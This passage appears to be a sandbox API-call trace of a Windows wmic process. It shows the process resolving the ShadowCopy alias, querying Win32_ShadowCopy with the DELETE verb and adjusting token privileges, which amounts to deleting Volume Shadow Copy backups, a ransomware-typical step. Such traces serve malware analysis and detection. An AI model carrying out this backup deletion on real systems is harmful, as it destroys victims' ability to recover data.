0x1 [0109.321] free (_Block=0x28beb0) [0109.321] free (_Block=0x28be90) [0109.321] free (_Block=0x28be70) [0109.321] free (_Block=0x28bef0) [0109.321] IWbemServices:GetObject (in: This=0x1db3a98, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x1cf9f8*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf9f8*=0x1dc04e0, ppCallResult=0x0) returned 0x0 [0109.341] malloc (_Size=0x18) returned 0x28bef0 [0109.342] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="Target", lFlags=0, pVal=0x1cf920*(varType=0x0, wReserved1=0xff1d, wReserved2=0x0, wReserved3=0x0, varVal1=0xff1d2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf920*(varType=0x8, wReserved1=0xff1d, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.342] free (_Block=0x28bef0) [0109.342] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.342] malloc (_Size=0x3e) returned 0x28cbf0 [0109.342] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.342] malloc (_Size=0x18) returned 0x28bef0 [0109.342] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="PWhere", lFlags=0, pVal=0x1cf920*(varType=0x0, wReserved1=0xff1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf920*(varType=0x8, wReserved1=0xff1d, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.342] free (_Block=0x28bef0) [0109.375] lstrlenW (lpString=" Where ID = '#'") returned 15 [0109.375] malloc (_Size=0x20) returned 0x28cc40 [0109.375] lstrlenW (lpString=" Where ID = '#'") returned 15 [0109.375] malloc (_Size=0x18) returned 0x28bef0 [0109.375] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="Connection", lFlags=0, pVal=0x1cf920*(varType=0x0, wReserved1=0xff1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x33bd48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf920*(varType=0xd, wReserved1=0xff1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1dc09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.375] free (_Block=0x28bef0) [0109.375] IUnknown:QueryInterface (in: This=0x1dc09c0, riid=0xff167360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1cf910 | out: ppvObject=0x1cf910*=0x1dc09c0) returned 0x0 [0109.375] GetCurrentThreadId () returned 0xb10 [0109.375] ??0CHString@@QEAA@XZ () returned 0x1cf838 [0109.375] malloc (_Size=0x18) returned 0x28bef0 [0109.376] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Namespace", lFlags=0, pVal=0x1cf860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff17738f, varVal2=0x28bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x28bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.376] free (_Block=0x28bef0) [0109.376] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0109.376] malloc (_Size=0x16) returned 0x28bef0 [0109.376] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0109.376] malloc (_Size=0x18) returned 0x28be70 [0109.376] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Locale", lFlags=0, pVal=0x1cf860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x28bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.376] free (_Block=0x28be70) [0109.376] lstrlenW (lpString="ms_409") returned 6 [0109.376] malloc (_Size=0xe) returned 0x28be70 [0109.376] lstrlenW (lpString="ms_409") returned 6 [0109.376] malloc (_Size=0x18) returned 0x28be90 [0109.376] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="User", lFlags=0, pVal=0x1cf860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.376] free (_Block=0x28be90) [0109.376] malloc (_Size=0x18) returned 0x28be90 [0109.376] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Password", lFlags=0, pVal=0x1cf860*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.377] free (_Block=0x28be90) [0109.377] malloc (_Size=0x18) returned 0x28be90 [0109.377] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Server", lFlags=0, pVal=0x1cf860*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x28bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.377] free (_Block=0x28be90) [0109.377] lstrlenW (lpString=".") returned 1 [0109.377] malloc (_Size=0x4) returned 0x289080 [0109.377] lstrlenW (lpString=".") returned 1 [0109.377] malloc (_Size=0x18) returned 0x28be90 [0109.377] IWbemClassObject:Get (in: This=0x1dc09c0, wszName="Authority", lFlags=0, pVal=0x1cf860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0x28bef0), pType=0x0, plFlavor=0x0) returned 0x0 [0109.377] free (_Block=0x28be90) [0109.377] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.377] IUnknown:Release (This=0x1dc09c0) returned 0x1 [0109.377] GetCurrentThreadId () returned 0xb10 [0109.377] ??0CHString@@QEAA@XZ () returned 0x1cf838 [0109.377] malloc (_Size=0x18) returned 0x28be90 [0109.377] IWbemClassObject:Get (in: This=0x1dc04e0, wszName="__RELPATH", lFlags=0, pVal=0x1cf860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x36a668, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0109.378] free (_Block=0x28be90) [0109.378] malloc (_Size=0x18) returned 0x28be90 [0109.378] GetCurrentThreadId () returned 0xb10 [0109.378] ??0CHString@@QEAA@XZ () returned 0x1cf6b8 [0109.378] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf6d0 [0109.379] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1cf660 [0109.379] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0109.380] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x28cc70 [0109.380] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0109.380] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf620 [0109.381] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf668 [0109.381] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf6d0 [0109.381] ??1CHString@@QEAA@XZ () returned 0x4c50a801 [0109.381] ??1CHString@@QEAA@XZ () returned 0x4c50a801 [0109.381] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf628 [0109.381] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf660 [0109.381] ??1CHString@@QEAA@XZ () returned 0x1 [0109.381] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x28cce0 [0109.381] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0109.381] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1cf620 [0109.381] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1cf668 [0109.381] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf6d0 [0109.381] ??1CHString@@QEAA@XZ () returned 0x4c50a801 [0109.381] ??1CHString@@QEAA@XZ () returned 0x4c50a801 [0109.381] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1cf628 [0109.381] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1cf660 [0109.381] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.381] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0109.381] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.381] malloc (_Size=0x18) returned 0x28beb0 [0109.381] malloc (_Size=0x18) returned 0x28bf10 [0109.381] malloc (_Size=0x18) returned 0x28bf30 [0109.382] malloc (_Size=0x18) returned 0x28bf50 [0109.382] malloc (_Size=0x18) returned 0x28bf70 [0109.382] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0109.382] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0109.382] malloc (_Size=0x18) returned 0x28bf90 [0109.382] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0109.382] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0109.382] malloc (_Size=0x18) returned 0x28bfb0 [0109.382] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0109.382] SysStringLen (param_1="\"") returned 0x1 [0109.382] free (_Block=0x28bf90) [0109.382] free (_Block=0x28bf70) [0109.382] free (_Block=0x28bf50) [0109.382] free (_Block=0x28bf30) [0109.383] free (_Block=0x28bf10) [0109.383] free (_Block=0x28beb0) [0109.383] IWbemServices:GetObject (in: This=0x1db3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cf6a8*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf6a8*=0x1dc0a50, ppCallResult=0x0) returned 0x0 [0109.385] malloc (_Size=0x18) returned 0x28beb0 [0109.386] IWbemClassObject:Get (in: This=0x1dc0a50, wszName="Text", lFlags=0, pVal=0x1cf6e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff1d2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf6e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x364b10*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2edf90, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0109.386] free (_Block=0x28beb0) [0109.386] SafeArrayGetLBound (in: psa=0x364b10, nDim=0x1, plLbound=0x1cf6c0 | out: plLbound=0x1cf6c0) returned 0x0 [0109.386] SafeArrayGetUBound (in: psa=0x364b10, nDim=0x1, plUbound=0x1cf6b0 | out: plUbound=0x1cf6b0) returned 0x0 [0109.386] SafeArrayGetElement (in: psa=0x364b10, rgIndices=0x1cf6a4, pv=0x1cf6f8 | out: pv=0x1cf6f8) returned 0x0 [0109.386] malloc (_Size=0x18) returned 0x28beb0 [0109.386] malloc (_Size=0x18) returned 0x28bf10 [0109.386] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0109.386] free (_Block=0x28beb0) [0109.386] IUnknown:Release (This=0x1dc0a50) returned 0x0 [0109.386] free (_Block=0x28bfb0) [0109.386] ??1CHString@@QEAA@XZ () returned 0x4c50a801 [0109.386] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.386] free (_Block=0x28be90) [0109.386] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.386] lstrlenW (lpString="Shadow copy management.") returned 23 [0109.387] malloc (_Size=0x30) returned 0x2885c0 [0109.387] lstrlenW (lpString="Shadow copy management.") returned 23 [0109.387] free (_Block=0x28bf10) [0109.387] IUnknown:Release (This=0x1dc04e0) returned 0x0 [0109.387] free (_Block=0x28bed0) [0109.387] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.387] lstrlenW (lpString="PATH") returned 4 [0109.387] lstrlenW (lpString="DELETE") returned 6 [0109.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0109.387] lstrlenW (lpString="WHERE") returned 5 [0109.387] lstrlenW (lpString="DELETE") returned 6 [0109.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0109.387] lstrlenW (lpString="(") returned 1 [0109.387] lstrlenW (lpString="DELETE") returned 6 [0109.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0109.387] lstrlenW (lpString="/") returned 1 [0109.387] lstrlenW (lpString="DELETE") returned 6 [0109.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0109.387] lstrlenW (lpString="-") returned 1 [0109.387] lstrlenW (lpString="DELETE") returned 6 [0109.387] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0109.388] malloc (_Size=0x18) returned 0x28bed0 [0109.388] lstrlenW (lpString="GET") returned 3 [0109.388] lstrlenW (lpString="DELETE") returned 6 [0109.388] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.388] lstrlenW (lpString="LIST") returned 4 [0109.388] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.389] lstrlenW (lpString="SET") returned 3 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.389] lstrlenW (lpString="CREATE") returned 6 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.389] lstrlenW (lpString="CALL") returned 4 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0109.389] lstrlenW (lpString="ASSOC") returned 5 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0109.389] free (_Block=0x28bed0) [0109.389] lstrlenW (lpString="/") returned 1 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0109.389] lstrlenW (lpString="-") returned 1 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0109.389] lstrlenW (lpString="DELETE") returned 6 [0109.389] malloc (_Size=0xe) returned 0x28bed0 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] lstrlenW (lpString="GET") returned 3 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.390] lstrlenW (lpString="LIST") returned 4 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.390] lstrlenW (lpString="SET") returned 3 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.390] lstrlenW (lpString="CREATE") returned 6 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.390] lstrlenW (lpString="CALL") returned 4 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0109.390] lstrlenW (lpString="ASSOC") returned 5 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] lstrlenW (lpString="DELETE") returned 6 [0109.390] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0109.390] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.390] malloc (_Size=0x3e) returned 0x28cc70 [0109.390] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.390] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0109.391] malloc (_Size=0x18) returned 0x28bf10 [0109.391] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0109.391] lstrlenW (lpString="FROM") returned 4 [0109.391] lstrlenW (lpString="*") returned 1 [0109.391] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.391] malloc (_Size=0x18) returned 0x28be90 [0109.391] free (_Block=0x28bf10) [0109.391] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720090007c0006 | out: _String=0x0, _Context=0x720090007c0006) returned="from" [0109.391] lstrlenW (lpString="FROM") returned 4 [0109.391] lstrlenW (lpString="from") returned 4 [0109.391] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.391] malloc (_Size=0x18) returned 0x28bf10 [0109.391] free (_Block=0x28be90) [0109.391] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720091007c0006 | out: _String=0x0, _Context=0x720091007c0006) returned="Win32_ShadowCopy" [0109.391] malloc (_Size=0x18) returned 0x28be90 [0109.391] free (_Block=0x28bf10) [0109.391] free (_Block=0x28cc70) [0109.391] free (_Block=0x28be90) [0109.391] lstrlenW (lpString="SET") returned 3 [0109.391] lstrlenW (lpString="DELETE") returned 6 [0109.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.392] lstrlenW (lpString="CREATE") returned 6 [0109.392] lstrlenW (lpString="DELETE") returned 6 [0109.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.392] free (_Block=0x28bdd0) [0109.392] malloc (_Size=0x8) returned 0x28cc70 [0109.392] lstrlenW (lpString="GET") returned 3 [0109.392] lstrlenW (lpString="DELETE") returned 6 [0109.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.392] lstrlenW (lpString="LIST") returned 4 [0109.392] lstrlenW (lpString="DELETE") returned 6 [0109.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.392] lstrlenW (lpString="ASSOC") returned 5 [0109.392] lstrlenW (lpString="DELETE") returned 6 [0109.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.392] WbemLocator:IUnknown:AddRef (This=0x1da1390) returned 0x3 [0109.392] free (_Block=0x286700) [0109.392] lstrlenW (lpString="") returned 0 [0109.392] lstrlenW (lpString="XDUWTFONO") returned 9 [0109.392] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0109.392] lstrlenW (lpString="XDUWTFONO") returned 9 [0109.392] malloc (_Size=0x14) returned 0x28bdd0 [0109.392] lstrlenW (lpString="XDUWTFONO") returned 9 [0109.392] GetCurrentThreadId () returned 0xb10 [0109.393] GetCurrentProcess () returned 0xffffffffffffffff [0109.393] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cfa80 | out: TokenHandle=0x1cfa80*=0x29c) returned 1 [0109.393] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfa78 | out: TokenInformation=0x0, ReturnLength=0x1cfa78) returned 0 [0109.393] malloc (_Size=0x118) returned 0x28cc90 [0109.393] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x28cc90, TokenInformationLength=0x118, ReturnLength=0x1cfa78 | out: TokenInformation=0x28cc90, ReturnLength=0x1cfa78) returned 1 [0109.393] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x28cc90*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1834003289, Attributes=0x88ad), (Luid.LowPart=0x0, Luid.HighPart=2647808, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=587203360, Attributes=0x88ba), (Luid.LowPart=0x0, Luid.HighPart=2621784, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0109.393] free (_Block=0x28cc90) [0109.393] CloseHandle (hObject=0x29c) returned 1 [0109.393] lstrlenW (lpString="GET") returned 3 [0109.393] lstrlenW (lpString="DELETE") returned 6 [0109.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0109.393] lstrlenW (lpString="LIST") returned 4 [0109.393] lstrlenW (lpString="DELETE") returned 6 [0109.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0109.393] lstrlenW (lpString="SET") returned 3 [0109.393] lstrlenW (lpString="DELETE") returned 6 [0109.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0109.393] lstrlenW (lpString="CALL") returned 4 [0109.393] lstrlenW (lpString="DELETE") returned 6 [0109.393] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0109.393] lstrlenW (lpString="ASSOC") returned 5 [0109.393] lstrlenW (lpString="DELETE") returned 6 [0109.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0109.394] lstrlenW (lpString="CREATE") returned 6 [0109.394] lstrlenW (lpString="DELETE") returned 6 [0109.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0109.394] lstrlenW (lpString="DELETE") returned 6 [0109.394] lstrlenW (lpString="DELETE") returned 6 [0109.394] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0109.395] malloc (_Size=0x18) returned 0x28be90 [0109.395] lstrlenA (lpString="") returned 0 [0109.395] malloc (_Size=0x2) returned 0x286700 [0109.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff16314c, cbMultiByte=-1, lpWideCharStr=0x286700, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.395] free (_Block=0x286700) [0109.395] malloc (_Size=0x18) returned 0x28bf10 [0109.395] lstrlenA (lpString="") returned 0 [0109.395] malloc (_Size=0x2) returned 0x286700 [0109.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff16314c, cbMultiByte=-1, lpWideCharStr=0x286700, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.395] free (_Block=0x286700) [0109.395] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.395] malloc (_Size=0x3e) returned 0x28cc90 [0109.395] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0109.395] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0109.395] malloc (_Size=0x18) returned 0x28bfb0 [0109.395] free (_Block=0x28bf10) [0109.396] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720095006c0005 | out: _String=0x0, _Context=0x720095006c0005) returned="*" [0109.396] lstrlenW (lpString="FROM") returned 4 [0109.396] lstrlenW (lpString="*") returned 1 [0109.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0109.396] malloc (_Size=0x18) returned 0x28bf10 [0109.396] free (_Block=0x28bfb0) [0109.396] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x720096006c0005 | out: _String=0x0, _Context=0x720096006c0005) returned="from" [0109.396] lstrlenW (lpString="FROM") returned 4 [0109.396] lstrlenW (lpString="from") returned 4 [0109.396] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0109.396] malloc (_Size=0x18) returned 0x28bfb0 [0109.396] free (_Block=0x28bf10) [0109.396] wcstok (in: _String=0x0, _Delimiter=" ", 